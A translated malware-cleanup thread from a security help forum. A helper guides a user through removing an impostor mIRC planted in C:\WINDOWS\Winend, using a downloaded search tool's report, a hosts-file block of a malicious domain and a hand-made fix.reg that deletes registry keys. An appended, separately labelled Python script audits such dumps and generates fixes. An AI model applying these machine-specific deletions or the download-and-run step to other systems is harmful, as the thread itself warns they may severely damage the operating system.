If the file does not open, it is located here > C:\ComboFix.txt

Warning: this procedure was made for this computer. Any reuse may severely damage the operating system.
0
lml-mike Posts: 487 Status: Contributor 122

I use IRC regularly, do I still have to uninstall it?
0
Lyonnais92 Posts: 25708 Status: Security contributor 1 537

Re,

which IRC client do you use?
0
lml-mike Posts: 487 Status: Contributor 122

re,

I use version 6.35, the free one.

I get a warning saying the evaluation has expired, but by clicking Continue and waiting 5 seconds it launches the software anyway :)
0
Lyonnais92 Posts: 25708 Status: Security contributor 1 537

Hello,

do you still have the installer for this version?

If so, I think it is better to uninstall and then reinstall.

It seems to me that the malware overwrote your version in favour of its own (everything seems to be tied to winend and not to either logs or documents and settings)
0
lml-mike Posts: 487 Status: Contributor 122

Ah...

Well, I'll at least try to see about keeping my perform, my server list, my favourites and my scripts, and reinstall IRC.
0
Lyonnais92 Posts: 25708 Status: Security contributor 1 537

Hello,

don't go too fast, I should be able to help you, but I need a bit of time.

First do this (if it's not too late):

Download OAD http://sosvirus.changelog.fr/OAD.exe
- Save it on your Desktop

Double-click on OAD to launch it

- File name to search for: type or copy/paste:
mIRC

- Search type: select option 6 then confirm [enter]

OAD will now search for the file. Let it work until it has finished.
The search report will be displayed automatically as soon as it is done.

- Copy/paste this report into your next post.

Important note: depending on the size of the hard disks, this search may take several minutes. Be patient
0
lml-mike Posts: 487 Status: Contributor 122

I kept myself busy while waiting :)

Here is the report:

 18/03/2009 ---- 11:19:05,54  

----------------------------------
§§§§§§ [mIRC] §§§§§§
----------------------------------
[X] Registre
 
-------------- [  ] rapide
-- Fichier --- [  ] disque systeme
 ------------- [X] complete


********************
     [Registre] 
********************


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\mIRC]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com\www]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"DisplayIcon"="C:\\WINDOWS\\Winend\\mirc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"DisplayName"="mIRC"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"Publisher"="mIRC Co. Ltd."

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"URLUpdateInfo"="https://www.mirc.com/"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"UninstallString"="\"C:\\WINDOWS\\Winend\\mirc.exe\" -uninstall"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"InstallLocation"="C:\\Logs\\mIRC"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Logs\\mIRC\\mirc.exe"="C:\\Logs\\mIRC\\mirc.exe:*:Enabled:mIRC"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\Winend\\mirc.exe"="C:\\WINDOWS\\Winend\\mirc.exe:*:Disabled:mIRC"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Logs\\mIRC\\mirc.exe"="C:\\Logs\\mIRC\\mirc.exe:*:Enabled:mIRC"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\Winend\\mirc.exe"="C:\\WINDOWS\\Winend\\mirc.exe:*:Disabled:mIRC"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Logs\\mIRC\\mirc.exe"="C:\\Logs\\mIRC\\mirc.exe:*:Enabled:mIRC"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\Winend\\mirc.exe"="C:\\WINDOWS\\Winend\\mirc.exe:*:Disabled:mIRC"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com\www]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\Logs\\mIRC\\mirc.exe"="mIRC"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\WINDOWS\\Winend\\mirc.exe"="mIRC"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCChannel"=""

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCChatMsg"=dword:00000000

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCTeamChatMsg"=dword:00000000

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCExtraSpaces"=dword:00000001

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCMaxNameLen"=dword:0000001b

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCStatsDeath"=dword:00000001

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCStatsFrags"=dword:00000001

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCStatsEff"=dword:00000000

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCProtectLogAddress"=dword:00000000

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\HLSW\Settings]
"MIRCSkin"="Default (English)"

"c"="V:\\eMule\\Incoming\\Jeux\\Prince.of.Persia-SKIDROW[www.TmasGames.com]\\Prince.of.Persia-SKIDROW\\sr-pop.iso"
"i"="C:\\WINDOWS\\Winend\\mirc.exe"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\exe]
"b"="C:\\WINDOWS\\Winend\\mirc.exe"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com\www]

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\Logs\\mIRC\\mirc.exe"="mIRC"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\mIRC]

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\mIRC\About]

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\mIRC\LastRun]

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Valve\Steam\Users\3186793\friends\23083747]
"name"=".#oMaaaKk' - mirc #last.css"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Valve\Steam\Users\3186793\friends\23083747\NameHistory]
"0"=".#oMaaaKk' - mirc #last.css"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Valve\Steam\Users\3186793\friends\38920006]
"name"="mirco98/poche volte vegas"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Valve\Steam\Users\3186793\friends\38920006\NameHistory]
"0"="mirco98/poche volte vegas"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Classes\irc\DefaultIcon]
@="\"C:\\Logs\\mIRC\\mirc.exe\""

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Classes\irc\Shell\open\command]
@="\"C:\\Logs\\mIRC\\mirc.exe\" %1"

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003_Classes\irc\DefaultIcon]
@="\"C:\\Logs\\mIRC\\mirc.exe\""

[HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003_Classes\irc\Shell\open\command]
@="\"C:\\Logs\\mIRC\\mirc.exe\" %1"

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com\www]

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\Logs\\mIRC\\mirc.exe"="mIRC"

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\WINDOWS\\Winend\\mirc.exe"="mIRC"

*******************
     [Fichier] 
*******************

c:\Documents and Settings\All Users\Menu Démarrer\Programmes\mIRC
c:\Documents and Settings\All Users\Menu Démarrer\Programmes\mIRC\mIRC.lnk
c:\Documents and Settings\lml-mike\Application Data\Microsoft\Internet Explorer\Quick Launch\mIRC.lnk
c:\Documents and Settings\lml-mike\Application Data\mIRC
c:\Documents and Settings\lml-mike\Application Data\mIRC\mirc.ini
c:\Logs\mIRC
c:\Logs\mIRC\defaults\mirc.ini
c:\Logs\mIRC\mirc.chm
c:\Logs\mIRC\mirc.exe
c:\WINDOWS\Prefetch\MIRC.EXE-31799806.pf
c:\WINDOWS\Winend\mirc.exe
c:\WINDOWS\Winend\mirc.ini


*********************
     [Même date] 
*********************

[17/03/2009 ] --- REP ---> C:\Program Files\Intel   
[17/03/2009 ] --- REP ---> C:\Program Files\Marvell   
[17/03/2009 ] --- REP ---> C:\Program Files\trend micro  
[17/03/2009 ] ---> C:\Boot.bak   
[17/03/2009 ] ---> C:\cmldr   
[17/03/2009 ] ---> C:\ComboFix.txt   
[17/03/2009 ] ---> C:\WINDOWS\fdsv.exe   
[17/03/2009 ] ---> C:\WINDOWS\grep.exe   
[17/03/2009 ] ---> C:\WINDOWS\KB959772.log   
[17/03/2009 ] ---> C:\WINDOWS\NIRCMD.exe   
[17/03/2009 ] ---> C:\WINDOWS\sed.exe   
[17/03/2009 ] ---> C:\WINDOWS\SWREG.exe   
[17/03/2009 ] ---> C:\WINDOWS\SWSC.exe   
[17/03/2009 ] ---> C:\WINDOWS\SWXCACLS.exe   
[17/03/2009 ] ---> C:\WINDOWS\system32\CSVer.dll   
[17/03/2009 ] ---> C:\WINDOWS\VFIND.exe   
[17/03/2009 ] ---> C:\WINDOWS\ydi.log   
[17/03/2009 ] ---> C:\WINDOWS\YukonInstall.log   
[17/03/2009 ] ---> C:\WINDOWS\zip.exe   
[Répertoire ] --- REP ---> C:\Program Files\Files   



Outil Aide Diagnostic By !aur3n7 Version 1.1
----------------------------------
§§§§§ Fin Rapport §§§§§ 
----------------------------------


0
Lyonnais92 Posts: 25708 Status: Security contributor 1 537

Re,

first, if they aren't there already, add this to your hosts file (in c:\windows\system32\drivers\etc):

127.0.0.1 mircosoftantispy.com
127.0.0.1 www.mircosoftantispy.com

was everything in C:\\Logs\\mIRC installed by you?
0
lml-mike Posts: 487 Status: Contributor 122

hi!

Yes, everything installed in that directory comes from me.

I added the 2 lines to the hosts file :)
0
Lyonnais92 Posts: 25708 Status: Security contributor 1 537

Hello,

we should be able to remove the winend version of mIRC without touching the rest.

Back up the contents of C:\Logs\mIRC anyway.

Open Notepad.
Copy the text below (between the * lines but without the *) into it (copy/paste):

*****************************
REGEDIT4

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"DisplayIcon"="C:\\Logs\\mIRC\\mirc.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"UninstallString"="\"C:\\Logs\\mIRC\\mirc.exe\" -uninstall"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\Winend\\mirc.exe"=-
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\Winend\\mirc.exe"=-
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\Winend\\mirc.exe"=-
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
[-HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\WINDOWS\\Winend\\mirc.exe"=-
[-HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
[-HKEY_USERS\S-1-5-21-789336058-1844237615-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
[-HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
[-HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]

*****************************
Click on "File", "Save As".
Click on Desktop (in the left-hand column)
In File name, type fix.reg
For Type, choose "All files" from the drop-down menu.
Click Save.
Close Notepad

On your desktop, double-click the Fix.reg icon
Accept the warning about the merge
The fix will run without showing anything.
At the end, you will see a message saying the merge is complete. Confirm it.

Try to delete C:\WINDOWS\Winend
0
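The two mIRC copies in the OAD report above (the genuine one in C:\Logs\mIRC and the malware's in C:\WINDOWS\Winend) show up as a handful of registry inconsistencies, which the fix.reg just posted undoes by hand. As an added example, not part of the thread and not OAD's own logic, the Python below parses a dump in the report's regedit-export format, flags those signs (an Uninstall entry whose executables sit outside its own InstallLocation, a firewall exception for a program under the Windows directory, a domain added to an IE zone) and emits a REGEDIT4 fix in the same conventions; the sample dump is constructed from the report above, and the system root C:\WINDOWS and the flagging rules are assumptions.

```python
"""Audit a registry dump in the OAD report's regedit-export format for the signs
this thread used to tell the impostor mIRC from the real one, and emit a REGEDIT4
fix in the conventions of the fix.reg above ([-key] deletes a key, "name"=- a value)."""
import re
from collections import OrderedDict

# Constructed sample modelled on the OAD report above (abridged, not the real file).
SAMPLE_DUMP = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"DisplayIcon"="C:\\WINDOWS\\Winend\\mirc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"UninstallString"="\"C:\\WINDOWS\\Winend\\mirc.exe\" -uninstall"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
"InstallLocation"="C:\\Logs\\mIRC"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\Logs\\mIRC\\mirc.exe"="C:\\Logs\\mIRC\\mirc.exe:*:Enabled:mIRC"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\\WINDOWS\\Winend\\mirc.exe"="C:\\WINDOWS\\Winend\\mirc.exe:*:Disabled:mIRC"
'''
WINDIR = r'C:\WINDOWS'  # assumption: the system root shown in the report
KEY_RE = re.compile(r'^\[(.+)\]$')
# "name"="value" with regedit escapes (\\ and \"); dword:/hex: values are skipped
STR_VAL_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
ZONE_RE = re.compile(r'^(.*\\ZoneMap\\(?:Esc)?Domains\\([^\\]+))', re.IGNORECASE)

def unescape(s):
    return re.sub(r'\\(.)', r'\1', s)

def escape(s):
    return s.replace('\\', '\\\\').replace('"', '\\"')

def parse_dump(text):
    """{key: {name: value}}; OAD repeats the [key] header before every value, so values are merged."""
    keys, current = OrderedDict(), None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, OrderedDict())
            continue
        m = STR_VAL_RE.match(line)
        if m and current is not None:
            keys[current][unescape(m.group(1))] = unescape(m.group(2))
    return keys

def split_command(cmd):
    """(exe path, remaining arguments, was the path quoted?) of a command line."""
    cmd = cmd.strip()
    end = cmd.find('"', 1) if cmd.startswith('"') else -1
    if end > 0:
        return cmd[1:end], cmd[end + 1:], True
    parts = cmd.split(' ', 1)
    return parts[0], (' ' + parts[1] if len(parts) > 1 else ''), False

def audit(keys):
    """Findings as (kind, key, detail) tuples, in dump order."""
    findings = []
    for key, values in keys.items():
        low = key.lower()
        # 1. Uninstall entry whose executables live outside its own InstallLocation
        if '\\uninstall\\' in low and 'InstallLocation' in values:
            loc = values['InstallLocation'].rstrip('\\').lower()
            for name in ('DisplayIcon', 'UninstallString'):
                if name in values:
                    exe, args, quoted = split_command(values[name])
                    if exe.rsplit('\\', 1)[0].lower() != loc:
                        findings.append(('uninstall_mismatch', key, (name, exe, args, quoted)))
        # 2. Firewall exception for a program placed under the Windows directory
        if low.endswith('\\authorizedapplications\\list'):
            for path in values:
                if path.lower().startswith(WINDIR.lower() + '\\'):
                    findings.append(('firewall_windir', key, path))
        # 3. Domain added to an IE zone: report the parent key once (its subkeys go with it)
        m = ZONE_RE.match(key)
        if m and ('zone_domain', m.group(1), m.group(2)) not in findings:
            findings.append(('zone_domain', m.group(1), m.group(2)))
    return findings

def build_fix(keys, findings):
    """REGEDIT4 text: drop zone keys and Windows-dir firewall exceptions, repoint
    uninstall values to the same-named executable inside InstallLocation."""
    lines = ['REGEDIT4', '']
    for kind, key, detail in findings:
        if kind == 'zone_domain':
            lines.append('[-%s]' % key)
        elif kind == 'firewall_windir':
            lines += ['[%s]' % key, '"%s"=-' % escape(detail)]
        else:
            name, exe, args, quoted = detail
            fixed = keys[key]['InstallLocation'].rstrip('\\') + '\\' + exe.rsplit('\\', 1)[-1]
            cmd = '"%s"%s' % (fixed, args) if quoted else fixed + args
            lines += ['[%s]' % key, '"%s"="%s"' % (name, escape(cmd))]
    return '\n'.join(lines) + '\n'
```

Run `build_fix(keys, audit(keys))` on `parse_dump(SAMPLE_DUMP)` and the output contains the same three kinds of lines as the fix.reg above; the findings list is meant for a reviewer to check before merging anything.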